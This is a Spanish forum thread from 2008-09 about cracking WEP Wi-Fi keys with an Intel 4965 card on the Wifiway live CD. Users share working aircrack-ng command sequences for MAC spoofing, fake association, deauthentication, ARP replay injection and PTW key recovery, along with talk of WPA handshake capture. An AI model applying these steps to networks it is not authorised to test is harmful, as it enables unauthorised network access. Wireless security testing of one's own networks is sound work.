http://www.youtube.com/watch?v=yMgYyii69Ps

si hubiese algun problema con esto, estoy en total acuerdo que sea borrado  :P :P :P 

solo espero y les sirva de algo

un saludo dexter back  >:(

Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 15-12-2008, 15:26 (Lunes)
Genial dexter, no se ve muy bien, pero como vas poniendo tu las anotaciones está perfecto, lo añado al post principal para que se vea, gracias por el video  ;)
Título: Re: Inyectar con 4965
Publicado por: *dudux en 15-12-2008, 17:33 (Lunes)
hola antes que nada espero y no haya problema si pongo esto aqui  ;)
y 2do una disculpa por la calidad, pero como ya habia mencionado, me dan lata los grabadores de pantalla  :-\

http://www.youtube.com/watch?v=yMgYyii69Ps

si hubiese algun problema con esto, estoy en total acuerdo que sea borrado  :P :P :P 

solo espero y les sirva de algo

un saludo dexter back  >:(



jajaja-.......por cierto esos APs INFINITUMXXXYYY tienen todos 64 bits de wep??¿
Título: Re: Inyectar con 4965
Publicado por: dario en 16-12-2008, 14:33 (Martes)
estoy siguiendo la guia paso a paso del video ! obvio modificando los datos por los de mi red WEP y me da error aqui !

airodump-ng  -w dario  --bssid (mac de nuestro router )  -C  X mon0

me da el error con la red q pruebe  me dice

checking available frequencies, this could take few seconds.
done        --------- aca flashee que iba a funcionar pero el destino dijo no !   
No valid frequency given

o sea me dice que la frecuencia dada no es valida !
Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 16-12-2008, 20:57 (Martes)
hola a todos,

Tengo una duda respecto a todo lo explicado aquí respecto a lo del wpa_supplicant con Wifiway 1.0 final y la 4965

La inyeccion cuando hay algun cliente asociado debería funcionar directamente?

Lo digo pq contra un cliente asociado me inyecta pero los data no suben.

Haciendo lo mismo con mi ubuntu con el kernel 2.6.26.5 el mismo equipo contra el mismo cliente si que me suben los data.
Deduzco que el comportamiento de los kernels y/o versiones de los drivers hace que lo detecte mejor o peor pq si no no sé.

Seguiré experimentando.


Aprovecho para dar una sugerencia a los que lo tengan instalado.

Yo en mi ubuntu, tunee el airoscript para que cuando tuviera que hacer la asocicion falsa te generara el fichero <nomre_red>.conf con los datos necesarios y que lanzara automaticamente el wpa_supplicant contra este fichero. Así te ahorras de hacerlo a mano. Al acabar hasta lo puedes destruir y limpiar el proceso si quieres.


Gracias.

Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 16-12-2008, 21:39 (Martes)
Haces la desautentificacion para conseguir que suban los arp? ;D
Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 16-12-2008, 22:46 (Martes)
No, si esta conectado, solamente navego con el cliente con el que quiero hacer la prueba (es mio) y con ubuntu cuando inyecta suben los data pero con wifiway no.
Título: Re: Inyectar con 4965
Publicado por: dexter back en 17-12-2008, 00:33 (Miércoles)

Aprovecho para dar una sugerencia a los que lo tengan instalado.

Yo en mi ubuntu, tunee el airoscript para que cuando tuviera que hacer la asocicion falsa te generara el fichero <nomre_red>.conf con los datos necesarios y que lanzara automaticamente el wpa_supplicant contra este fichero. Así te ahorras de hacerlo a mano. Al acabar hasta lo puedes destruir y limpiar el proceso si quieres.


Gracias.



seria bueno que lo subieras para probar  >:(

un saludo
Título: Re: Inyectar con 4965
Publicado por: dario en 17-12-2008, 11:47 (Miércoles)
Con respecto a mi problema nadie respondio ?

Alguno tiene idea ?

Gracias :D
Título: Re: Inyectar con 4965
Publicado por: *dudux en 17-12-2008, 12:10 (Miércoles)
estoy siguiendo la guia paso a paso del video ! obvio modificando los datos por los de mi red WEP y me da error aqui !

airodump-ng  -w dario  --bssid (mac de nuestro router )  -C  X mon0

me da el error con la red q pruebe  me dice

checking available frequencies, this could take few seconds.
done        --------- aca flashee que iba a funcionar pero el destino dijo no !   
No valid frequency given

o sea me dice que la frecuencia dada no es valida !


-c de canal en minusculas
Título: Re: Inyectar con 4965
Publicado por: dexter back en 18-12-2008, 03:02 (Jueves)
estoy siguiendo la guia paso a paso del video ! obvio modificando los datos por los de mi red WEP y me da error aqui !

airodump-ng  -w dario  --bssid (mac de nuestro router )  -C  X mon0

me da el error con la red q pruebe  me dice

checking available frequencies, this could take few seconds.
done        --------- aca flashee que iba a funcionar pero el destino dijo no !   
No valid frequency given

o sea me dice que la frecuencia dada no es valida !


-c de canal en minusculas

muy buen ojo  ;D
Título: Re: Inyectar con 4965
Publicado por: dario en 18-12-2008, 11:11 (Jueves)
Ante todo una vez mas muchas gracias no solo a los del staff sino a todos los que toman su tiempo y responden .

Si era ese el error se me paso la C en mayuscula !!

Luego una pregunta pude crackear mi propia red (la clave en hexa que me dio es de  26 caracteres o sea 13 pares hay algo mal no??)

(http://img360.imageshack.us/img360/3985/estamalbs1.jpg)

pero lo que no me subian eran los ACKS nunca se movieron de  0 ..  puede ser  que haya que desactivar korec ?

si es asi como se hace o sea en que paso se debe hacer y si dejan el comando se agradeceria.. 
acaro ando googleando al respecto :D
Muchisimas Gracias  // Dario

Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 20-12-2008, 15:21 (Sábado)
Hola a todos,

Sigo sin poder inyecar con la 4965 con el wifiway 1.0 final instalado.

Inyecto sobre un cliente que ya existe y si que me dice que envia un monton de paquetes pero los Data a penas se mueven.

Otra cosa:

Como os paso mi moficación de airoscript que lanza el cliente con wpa_supplicant para que la probeis?

Gracias.
Título: Re: Inyectar con 4965
Publicado por: Jacko en 20-12-2008, 17:34 (Sábado)
cuélgalo en algun sitio de modo que los que usamos la liveCD tan solo tengamos que hacer wget  ...

Un saludo.
Título: Re: Inyectar con 4965
Publicado por: *dudux en 20-12-2008, 17:55 (Sábado)
Hola a todos,

Sigo sin poder inyecar con la 4965 con el wifiway 1.0 final instalado.

Inyecto sobre un cliente que ya existe y si que me dice que envia un monton de paquetes pero los Data a penas se mueven.

Otra cosa:

Como os paso mi moficación de airoscript que lanza el cliente con wpa_supplicant para que la probeis?

Gracias.

mandamelo por mail y lo subo
Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 21-12-2008, 14:00 (Domingo)
hola a todos,

He colgado un 3  archivos que contienen las modificaciones que comentaba del wpa_supplicant en un espacio web que tengo en google:

Basicamente he modificado:
- el airoscript.es que venia en el wifiway 1.0 beta2  para que llame a la shell que crea el cliente falso
(clienteFalso.sh)
- He fijado la interficie de inyeccion a mon0
- He creado un script monitor.sh para preparar la tarjeta en modo monitor poniendole la mac falsa, fijada en airoscriptes.sh
- He modificado la manera de usar wlandecrypter para que use wepattack en vez del el ataque de diccionario con el flag -w que no funcionaba en versiones anteriores de aircrack-ng

Código: [Seleccionar]
function fakeauth {
 killall -9 wpa_supplicant > /dev/null
xterm $HOLD -title "Asociando con: $Host_SSID " $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -e ./clienteFalso.sh "$Host_SSID" $Host_MAC
}


Os podeis bajar clienteFalso.sh y airoscriptes.sh y monitor.sh de las siguientes urls:

http://sites.google.com/site/wificorsg/airoscript/airoscriptes.sh (http://sites.google.com/site/wificorsg/airoscript/airoscriptes.sh)

http://sites.google.com/site/wificorsg/airoscript/clienteFalso.sh (http://sites.google.com/site/wificorsg/airoscript/clienteFalso.sh)

http://sites.google.com/site/wificorsg/airoscript/monitor.sh (http://sites.google.com/site/wificorsg/airoscript/monitor.sh)

monitor.sh puede aceptar como parametro el canal.

Probadlo y el que pueda mejorarlo y adaptarrlo a la nueva version de airoscript pues mejor.

Todo esto lo he usado en ubuntu hardy.
Título: Re: Inyectar con 4965
Publicado por: Jacko en 21-12-2008, 15:14 (Domingo)
Hola, he probado tus scripts: el de monitor me rula bien, pero el airoscriptes.sh no me escanea las redes, justo antes de ponerse a escanear me suelta:

fopen failed: No such file or directory
Could not create "/home/corsg/wifi/capturas/dump-01.txt"


He probado dandole permisos  y tambien creando yo mismo los directorios siguiendo la misma ruta, e incluso creando el .txt pero me sigue dando el mismo error.
Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 21-12-2008, 22:00 (Domingo)
Ahora que lo dices, es verdad que en el airoscriptes.sh deje fijadas rutas a
mi máquina:

Código: [Seleccionar]
#The path where the data is stored (FOLDER MUST EXIST !)
DUMP_PATH="/home/corsg/wifi/capturas"
# Path to your wordlist file (for WPA dictionnary attack, maybe for WEP in next release to)
WORDLIST="/home/corsg/wifi/capturas/wordlist"
WORDLIST1="/home/corsg/wifi/capturas/wordlist/diccionariodlink"


Habría que reemplazar estas rutas por unas que tengais.

Yo este script lo uso con Ubuntu.

Haré la prueba con wifiway a ver si hay alguna peculiaridad que hace que de ese error pero existiendo los directorios no tendría que dar problemas.

De todas formas a ver si tengo un momento y lo pruebo.
Título: Re: Inyectar con 4965
Publicado por: Jacko en 21-12-2008, 23:29 (Domingo)
He vuelto a probar creando yo la ruta y me ha funcionado, aunque no he podido inyectar, sin embargo luego lo he intentado por comandos, siguiendo los pasos anteriormente descritos y si he podido inyectar aunque no me ha valido de nada porque aunque el aireplay decia que inyectaba a 498 pps, en el airodump, los data (IV's) subian a una velocidad desesperantemente lenta, a lo mejor en un segundo subian 10 data de golpe, y luego de tiraba varios segundos sin subir nada, aunque los packets si que subian a 498 al segundo. Para que veais mejor la situacion os dejo al siguiente captura.


(http://img523.imageshack.us/img523/1923/instantnea1xz2.th.png) (http://img523.imageshack.us/my.php?image=instantnea1xz2.png)


P.D. ¿Alguien sabe por qué me pasa eso de que los data me suban con tanta lentitud?
Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 21-12-2008, 23:57 (Domingo)
Jacko,

Entonces has conseguido que airoscriptes.sh te cree el cliente wpa_supplicant automatico con mi script? Cualquier mejora será bien recibida.

Respecto a lo de los data lento, es justamente lo que me pasa a mi:

aireplay-ng dice que inyecta y de hecho se ve que envia paquetes a gran velocidad pero airodump-ng muestra que los data a penas se mueven.

Alguien ha conseguido inyectar con exito de forma que los data suban rapido?

Si lo habeis conseguido es con inyección sobre un cliente existente o con uno falso?

Gracias.
Título: Re: Inyectar con 4965
Publicado por: Jacko en 22-12-2008, 02:25 (Lunes)
kyocarlos, respecto a tu pregunta, la respuesta es afirmativo   ;D

Me encantaría ayudarte con la programación del script, pero el caso es que no se nada de perl (ya no se enseña eso en ninguna facultad). Yo si pasas eso a Java, te ayudo en lo que quieras  ;)

Saludos.

P.D. La incógnita de aún inyectando a full, los data suben lentos sigue estando en el aire. Un compañero me ha dicho que podría ser porque estamos demasiado lejos del router, aunque no me convence.
Título: Re: Inyectar con 4965
Publicado por: eldayicara en 24-12-2008, 13:38 (Miércoles)
Hola a todos, he seguido el manual con las diferentes opciones que dais pero me he atascado en un paso. Esto es lo que hago, teniendo ya creado el wpa.conf (lo guardo en el escritorio y uso wifiway 1.0 final):
Código: [Seleccionar]
iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wmaster0  no wireless extensions.

wlan0     IEEE 802.11abgn  ESSID:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Tx-Power=0 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

wifiway ~ # airmon-ng start wlan0


Interface       Chipset         Driver

wlan0           Unknown         iwlagn - [phy0]
                                (monitor mode enabled on mon0)

wifiway ~ # sudo wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0
bash: sudo: command not found
wifiway ~ # -wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0
bash: -wpa_supplicant: command not found
wifiway ~ # sudo wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0
bash: sudo: command not found
wifiway ~ # sudo -wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0
bash: sudo: command not found
wifiway ~ # -sudo wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0
bash: -sudo: command not found
wifiway ~ # sudo wpa_supplicant -c/root/Desktop/wpa.conf -Dwext wlan0
bash: sudo: command not found
wifiway ~ # sudo wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0
bash: sudo: command not found
wifiway ~ # sudo wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -imon0
bash: sudo: command not found
wifiway ~ # sudo wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -suscuernos0
bash: sudo: command not found

Amos creo que ya lo he probao todo y nanai ;D Se os ocurre algo?
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 24-12-2008, 14:01 (Miércoles)
 :D Si, en wifiway no tienes que logearte como root, repite el comando pero sin el sudo  ;)
Título: Re: Inyectar con 4965
Publicado por: monkmonk en 24-12-2008, 15:26 (Miércoles)
Hola, yo no se que es lo que hago mal, pero no consigo que coja nada >.<

mira, uno Wifiway 1.0 final, i supuestamente, con la 4965 sin tenerle que hacer nada ya tiene que inyectar no?

bueno, pues los pasos que yo ago son estos:

1- ifconfig wlan0 down
2- macchanger -m 00:11:22:33:44:55 wlan0 (se cambia perfectamente)
3- miro, y si, esta en managed
4- ifconfig wlan0 up (sino no me deja escaniar con iwlist)
5- iwlist wlan0 scan
6- cambio la config con los datos de mi red para el wpa_supplicant
7- airmon-ng start wlan0 channel "micanal" (y sep, se pone en mon0)
8- airodump-ng -w "prueva" --bssid "laMACdelrouter" -c "micanal" mon0 (empieza a obserbar)
9-me asocio con: wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0 (/root/Desktop/wpa.conf esto es en mi caso solo) y lo hace, pero con un mensaje 1 poco diferente, esto ya me suena 1 poco raro ejeje aki os pongo la foto:

http://img131.imageshack.us/img131/1032/21238603zd9.png

10- aireplay-ng -3 -b "laMACdelrouter" -h "MACdela4965" mon0 (y empieza tan tranquila)


ahora viene el problema, y es que llevo 1 hora i media esperando, i no abanza ejejejjejj aqui os pongo las fotos:

http://img512.imageshack.us/img512/3775/14937798sa7.png

http://img512.imageshack.us/img512/5743/41816547ls5.png

(no estan hechas en el mismo tiempo)

no se si es el mensaje este raro que me tiro el wpa_supplicant, o es que no inyecta.. nosep..^^

espero que alguien me pueda ayudar jejeje

gracias por leerlo!^^





MODIFICADOOOO xddd


una cosa!!, que me acabo de despistar un rato, y empezo a inyectar!!!
pero mi pergunta ahora es.... porque me empieza a las 2 horas?? que tengo que hacer para que empieze mas rapido?

foto:

http://img262.imageshack.us/img262/8346/12nh5.png

xddd




MODIFICADOOOO (por segunda vez xd)

es normal que me pase esto con tantos ivs??

foto:
http://img253.imageshack.us/my.php?image=13cb0.png

estoy hecho un lio >.<

PD: espero que me explique bien con tanta foto  jejejjej




MODIFICADOOOO (por tercera vez xd)

al final lo prove con PTW i me funciono, pero porque con PTW no tardo ni 1 segundo y de la forma normal no lo conseguia??

foto:

http://img185.imageshack.us/img185/1716/152ud2.png

PD: siento tantas modificaciones, pero es que no queria spammear y a la vez queria mantereros informados de lo que me pasava^^ nose si ice bien o mal ejejej
grax^^
Título: Re: Inyectar con 4965
Publicado por: eldayicara en 24-12-2008, 15:39 (Miércoles)
Sí señor, asociación perfecta! Muchísimas gracias Bht Sata!
Título: Re: Inyectar con 4965
Publicado por: Jacko en 24-12-2008, 16:49 (Miércoles)
monkmonk a ti en windows la red esa que has crackeado, ¿cuantas rallitas verdes te da?
Título: Re: Inyectar con 4965
Publicado por: monkmonk en 24-12-2008, 17:16 (Miércoles)
Jacko, la verdad es k pokita, un 20% o asin...

foto:
http://img78.imageshack.us/img78/7780/dibujoeq4.jpg

pero igualmente, no entiendo el porque me tarda 2 horas en empezar.. >.<
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 25-12-2008, 19:50 (Jueves)
Haber por pasos, el mensaje del wpa_supplicant es normal, segundo, el problema del aircrack es normal, hay veces que se mete en un bucle y no halla nunca la clave, y tercero, para tu problema de inyeccion prueba a realizar una desautentificacion para que suban antes, haber si asi funciona, 1 saludo  ;)
Título: Re: Inyectar con 4965
Publicado por: monkmonk en 25-12-2008, 22:09 (Jueves)
que va tio, con la desautentificacion pasa lo mismo, me paso horas para que empieze, bueno.. nuse si se pasa horas, porque solo me a empezado una vez a las 2 horas, porque esta noche lo he dejado haver si hacia algo, y se ha pasado 7 horas, y nada.

jejej, weno, haver si me funciona de alguna manera >.<
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 25-12-2008, 23:27 (Jueves)
Pues si que es cosa rara si...pero los packets suben? o tampoko, estas falsificando el cliente o lo haces con uno conectado  :-\
Título: Re: Inyectar con 4965
Publicado por: Jacko en 26-12-2008, 00:45 (Viernes)
respuesta para el problema del aircrack:

¿habeis probado a usar el aircrack-ptw ?

Corregidme si me equivoco pero segun he leido en otro post este es su uso:

aircrack-ptw ficherocaptura.cap

o

aircrack-ng -z ficherocaptura.cap


Un saludo !

P.D. ¿Ambos comandos son equivalentes, no?
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 26-12-2008, 01:43 (Viernes)
Citar
MODIFICADOOOO (por tercera vez xd)

al final lo prove con PTW i me funciono, pero porque con PTW no tardo ni 1 segundo y de la forma normal no lo conseguia??

foto:

http://img185.imageshack.us/img185/1716/152ud2.png

PD: siento tantas modificaciones, pero es que no queria spammear y a la vez queria mantereros informados de lo que me pasava^^ nose si ice bien o mal ejejej
grax^^

Si, parece ser que si  ;D
Título: Re: Inyectar con 4965
Publicado por: Jacko en 26-12-2008, 02:20 (Viernes)
POR FIN !!!!!!!!!!!  POR FIN HE LOGRADO INYECTAR  !!!!!!!!!!

Bueno antes de nada tengo que dar las gracias a todas las personas de que han contribuido en este hilo porque gracias a ellos he logrado sacar mi primera wep no perteneciente a una WLAN_XX.  ;D

Bueno respecto al post anterior que he hecho me constesto yo mismo ya que seguro que ha alguien le sirve de ayuda:

Los dos comandos que he puesto son perfectamente válidos (en la version actual de wifiway), no obstante es mejor usar aircrack-ng -z ficherodecaptura.cap porque con el otro tienes que ponerle la ruta ubicando el .cap. Personalmente yo uso esto: aircrack-ng -z *.cap  asi me quito de escribir el nombre del archivo de captura y además uso el aircrack-ptw ( que para eso es la opción -z). Además de que con la opción -z, personalmente he sacado la clave en 0 segundos (con 30.000 IV's como podeis ver en la captura mas abajo), mientras que sin ella dura mucho mas.

En un humilde intento por ayudar a los que están como yo estaba antes, voy a explicar los pasos que he seguido detalladamente:

-------------------------------------------------------------------------------------------------------------------------------

1º Arranco wifiway, entro en modo gráfico. Abro el airodump y miro que red voy a crackear, y copio en un .txt aparte toda la info.

airmon-ng start wlan0 CHANNEL

3º Creo el wpa.conf

Código:

network={
        ssid="ESSID"
        key_mgmt=NONE
        bssid=BSSID
        wep_key0="232323343478787"
}

ifconfig wlan0 down

macchanger -m 00:11:22:33:44:55 wlan0

ifconfig wlan0 up

wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0

(http://img122.imageshack.us/img122/4674/asociacionmodqq3.png)

Como podeis ver al primera vez que puse el comando me salió el dichoso bucle infinito: Failed to iniciate AP scan ...
Pero hize Ctrl+C y volvi a poner el mismo comando y ya me asoció, podeis ver lo de CONNECTED.

airodump-ng -w dexter-back -c CHANNEL mon0

(http://img9.imageshack.us/img9/8427/airodumpmod.png)

aireplay-ng -3 -b MAC DEL AP -h 00:11:22:33:44:55 mon0

(http://img377.imageshack.us/img377/2811/aireplaymodpd5.png)

aircrack-ng -z *.cap

10º KEY FOUND!

(http://img357.imageshack.us/img357/5374/aircrackmodjm1.png)


NOTA: Personalmente me comienza a inyectar 2 ó 3 minutos después de ejecutar el aireplay. Sobre el tema de que si estas muy lejos no puedes inyectar, tan solo tengo que decir que a mi en Windows solo me aparece esta red con una sola rallita verde y muchas veces ni siquiera la pillo, sin embargo ya veis que he sacado la clave en pocos minutos.
Título: Re: Inyectar con 4965
Publicado por: monkmonk en 26-12-2008, 13:39 (Viernes)
Pues todavia nose el xk se pasa horas para inyectar o ni sikiera lo hace, i yo el router lo tengo a 2 rallitas con windows y tu a una i a los 3 mins ya empieza? que suerte cabron jejejejje
no lo entiendo, puede ser xk al router le pongo wep, i luego paro el pc? o sea, se keda el router solo. pero esto no tendria k ser problema! >.< no lo entiendo, y no puedo provar lo del mac filter xk no tengo nadie k se connecte a mi router aparte de yo xddd xk el pc del router ya usa su misma mac para connectar >.< cagonlaleche! xddddddd no me podria haver comprado un lapton con una 3945 no... xddddd

modificado:
PD: solo me van subiendo muuuuuuuuuuuuuuy lentamente los ACKs, que son?
Título: Re: Inyectar con 4965
Publicado por: Jacko en 26-12-2008, 16:34 (Viernes)
no se que son los ACKS, pero si te fijas en mi captura, yo ACKs no pillo ni uno  >:(
Título: Re: Inyectar con 4965
Publicado por: drvalium en 26-12-2008, 17:58 (Viernes)
buenas

Citar
ACKNOWLEDGEMENT (ACK) (en español acuse de recibo): en comunicaciones entre computadores, es un mensaje que se envía para confirmar que un mensaje o un conjunto de mensajes han llegado. Si el terminal de destino tiene capacidad para detectar errores, el significado de ACK es "ha llegado y además ha llegado correctamente".

para definición completa

http://es.wikipedia.org/wiki/ACK


saludos
Título: Re: Inyectar con 4965
Publicado por: monkmonk en 26-12-2008, 18:08 (Viernes)
ok grac por la respuesta^^

la verdad, es k me a pasado algo raro ahorayo estava asin:


ROUTER--------> connectado con mi pc con un wifi
   |
   |
   |
el laptop intentando inyectar



pero no lo conseguia, hasta que me he desconectado con el PC grande, y entonces ha empezado a inyectar como cosaco a 500/s mas o menos, alguien save el porque me pasa esto?
Título: Re: Inyectar con 4965
Publicado por: Jacko en 26-12-2008, 18:16 (Viernes)
ALguien sabe si para las redes WLAN_XX con cifrado wpa, sirve el diccionario del wlandecrypter ?
Título: Re: Inyectar con 4965
Publicado por: SERASER en 26-12-2008, 19:50 (Viernes)
seguro no las wlanXX tienen por defecto claves wep y entonces la han cambiado por wpa a esperar tipkung
Título: Re: Inyectar con 4965
Publicado por: Jacko en 26-12-2008, 20:53 (Viernes)
seguro no las wlanXX tienen por defecto claves wep y entonces la han cambiado por wpa a esperar tipkung


Perdona pero no acabo de entender lo que has dicho.

y eso de "tipkung" que es ?
Título: Re: Inyectar con 4965
Publicado por: SERASER en 26-12-2008, 21:21 (Viernes)
basicamente un nuevo sistema de recuperacion de claves wpa que no se basa en diccionario pero esta en fase inicial y no esta depurado lo incluye wifiway 1.0 final
Título: Re: Inyectar con 4965
Publicado por: Jacko en 26-12-2008, 21:43 (Viernes)
ah pues no tenia ni idea de que existia nada llamado tipkung, de hecho he buscado en el buscador del foro y en google y no he encontrado absolutamente nada.

Pero mi pregunta era, que si pillo 1 handshake de una WLAN_XX y luego uso el aircrack pasandole el diccionario creado mediante el wlandecrypter, si eso tendría exito.
Título: Re: Inyectar con 4965
Publicado por: SERASER en 26-12-2008, 23:11 (Viernes)
ah pues no tenia ni idea de que existia nada llamado tipkung, de hecho he buscado en el buscador del foro y en google y no he encontrado absolutamente nada.

Pero mi pregunta era, que si pillo 1 handshake de una WLAN_XX y luego uso el aircrack pasandole el diccionario creado mediante el wlandecrypter, si eso tendría exito.

no, lee esto

https://foro.seguridadwireless.net/nueva_generacion_wireless/han_logrado_crackear_en_15_minutos_la_encriptacion_wpa_tkiptunng-t17321.0.html
Título: Re: Inyectar con 4965
Publicado por: Jacko en 27-12-2008, 02:49 (Sábado)
gracias por el apunte seraser.
Por cierto, alguien lo ha probado ????
 Yo tan solo he probado el atake 0 ( aireplay-ng -0 30 -a mac router -h Mac del cliente mon0 )para pillar 1 handshake y no ha habido suerte.
Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 27-12-2008, 20:33 (Sábado)
hola a todos,

He estado probando multiples formas para conseguir inyectar sobre un cliente ya conectado y no hay manera. Aireplay-ng me dice enviando unj monton de paquetes pero los data a penas se mueven.

Alguien que lo haya conseguido me puede decir los pasos?

gracias.

Título: Re: Inyectar con 4965
Publicado por: Jacko en 28-12-2008, 00:31 (Domingo)
Me interesa el tema de las WPA. Alguien ha sacado alguna ?

P.D. Este es un hilo de inyección, por lo que, si los moderadores lo creen oportuno, abrimos otro hilo para WPA y 4965.
Título: Re: Inyectar con 4965
Publicado por: eldayicara en 28-12-2008, 01:01 (Domingo)
Ya hay un tema:

https://foro.seguridadwireless.net/live_cd_wifiway_10_renovation_kde/sacando_wpa_con_la_nueva_distro_10_final_con_tkiptunng-t17937.0.html

Pero parece que habrá que esperar a que pulan algo más el tkiptun-ng
Título: Re: Inyectar con 4965
Publicado por: Jacko en 28-12-2008, 01:32 (Domingo)
si, eso lo he visto. Yo de momento estoy intentando pillar 1 handshake con el atake 0, alguien lo ha logrado ???
Título: Re: Inyectar con 4965
Publicado por: monkmonk en 31-12-2008, 03:02 (Miércoles)
1 preguntita que tengo jejejej

despues de acavar con la inyeccion, sacar la pass, hacer pruevas... como vuelvo a poner el wifi normal?
esque solo lo se hacer reiniciando.

yo pruevo de hacer esto:

airmon-ng stop mon0 *
airmon-ng stop wlan0 *
ifconfig mon0 down (por si acaso xd)
ifconfig wlan0 down
iwconfig wlan0 mode managed
ifconfig wlan0 up

pero nosep, el NetworkManager no acava de connectar nunca justo despues de estar inyectando y esas cosillas jejeej
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 02-01-2009, 13:45 (Viernes)
Pues yo he seguido los pasos al pie de la letra de jacko y nada.... No me suben los ARP. He probado tambien a forzarlos usando el comando aireplay-ng -0 1 -a (macdelrouter) -h 00:11:22:33:44:55 mon0 pero tampoco consigo que los ARP suban. Una vez ayer lo consegui pero no se como hice. A ver si me podeis echar una mano.

Edit: En esta captura q hice me aparecen cosas raras.

(http://img84.imageshack.us/img84/7592/instantnea1jn4.th.jpg) (http://img84.imageshack.us/my.php?image=instantnea1jn4.jpg)

privado es la red de la cual quiero saber su clave. Pero lo otro q me aparece q es?? el 00:02:CF:BA:8C:9A y el 00:19:5B:1D:E9:7A??? Y la otra station q me aparece?? en la captura de jacko solo aparece la red q quiere atacar y el mismo. no se porq a mi me aparece eso tan distinto. Sabeis porq es??

Un saludo.
Título: Re: Inyectar con 4965
Publicado por: Jacko en 02-01-2009, 19:21 (Viernes)
en la captura de jacko solo aparece la red q quiere atacar y el mismo. no se porq a mi me aparece eso tan distinto. Sabeis porq es??

Un saludo.

A mi solo me aparece una red porque donde yo vivo, el único que tiene wifi soy yo  >:D

Sobre lo de las redes esas que se llaman  <length: 10> yo pillo una y está sin proteger, pero no se qué es, no se si realmente es una red wifi o no, porque cuando me voy a conectar con el asistente de windows me pide que le introduzca un nombre para la red, y seguidamente me dice que no me he podido conectar.

¿Alguien que pasa con estas redes y porque se llaman asi?
Título: Re: Inyectar con 4965
Publicado por: wannabe en 02-01-2009, 20:09 (Viernes)
No estoy seguro,pero creo que son las redes ocultas (sin essid)
Título: Re: Inyectar con 4965
Publicado por: Jacko en 02-01-2009, 20:40 (Viernes)
Por curiosidad, y ¿ como se oculta una red ? y que hace falta para conectarte a una red wifi oculta ?
Título: Re: Inyectar con 4965
Publicado por: biyonder en 02-01-2009, 21:12 (Viernes)
Hola chicos, vereis tengo un problema. Realizo todos los pasos correctamente, que son:

-Creo el fichero wpa.conf como se especifica en el post con los datos de mi red wifi(Bssid y Essid)
-airmon-ng start wlan0 canaldemiwifi (q en este caso es el 3)
-ifconfig wlan0 down
macchanger -m 11:22:33:44:55 wlan0
-ifconfig wlan0 up
-wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0

Y el error que me sale al hacer la asociacion es este:

ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 -
 Y se me queda el cursor detras del 0x0, sin conectar. ¿Que puedo estar haciendo mal? Gracias
Título: Re: Inyectar con 4965
Publicado por: wannabe en 03-01-2009, 16:31 (Sábado)
Algunos routers tienen la opcion de ocultar la red,entra en la configuración y mira en la sección de wireless si te sale algo.
Título: Re: Inyectar con 4965
Publicado por: dexter back en 03-01-2009, 19:45 (Sábado)
Hola chicos, vereis tengo un problema. Realizo todos los pasos correctamente, que son:

-Creo el fichero wpa.conf como se especifica en el post con los datos de mi red wifi(Bssid y Essid)
-airmon-ng start wlan0 canaldemiwifi (q en este caso es el 3)
-ifconfig wlan0 down
macchanger -m 11:22:33:44:55 wlan0
-ifconfig wlan0 up
-wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0

Y el error que me sale al hacer la asociacion es este:

ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 -
 Y se me queda el cursor detras del 0x0, sin conectar. ¿Que puedo estar haciendo mal? Gracias


haz provado no hacerle  caso al error y continuar con el siguiente paso?? XD..

intentalo!!!
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 03-01-2009, 19:55 (Sábado)
muy cierto lo que te comenta dexter back , a veces me tira errores pero si sigues termina funcionando igual ...  ;) (por lo menos en mi caso)

Saludos
Título: Re: Inyectar con 4965
Publicado por: eldayicara en 03-01-2009, 22:11 (Sábado)
...
macchanger -m 11:22:33:44:55 wlan0 --> En esta mac te faltan un par de dígitos ;)
...
Corrígelo a ver.
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 05-01-2009, 02:30 (Lunes)
No estoy muy familiarizado con el tema, pero se podria hacer lo de wpa_supplicant en otra tarjeta q no fuera la 4965AGN??? por ejemplo una broadcom 4321?? es q con este metodo ya he conseguido algunas claves wep y no querria cambiar.

Un saludo.
Título: Re: Inyectar con 4965
Publicado por: Jacko en 05-01-2009, 02:41 (Lunes)
la respuesta la obtendrás experiementando tú mismo.
Título: Re: Inyectar con 4965
Publicado por: pitiriguisvi en 05-01-2009, 12:43 (Lunes)
de 50.000 a 100.000 maximo con ptw
y con ng no hay numero standard < de 1.000.000 ivs

tengo que contradecirte xD mi clave salio a loss 1.300.000 ivs ....
Título: Re: Inyectar con 4965
Publicado por: monkmonk en 05-01-2009, 17:12 (Lunes)
a mi con ptw con 30k me sobra o.O

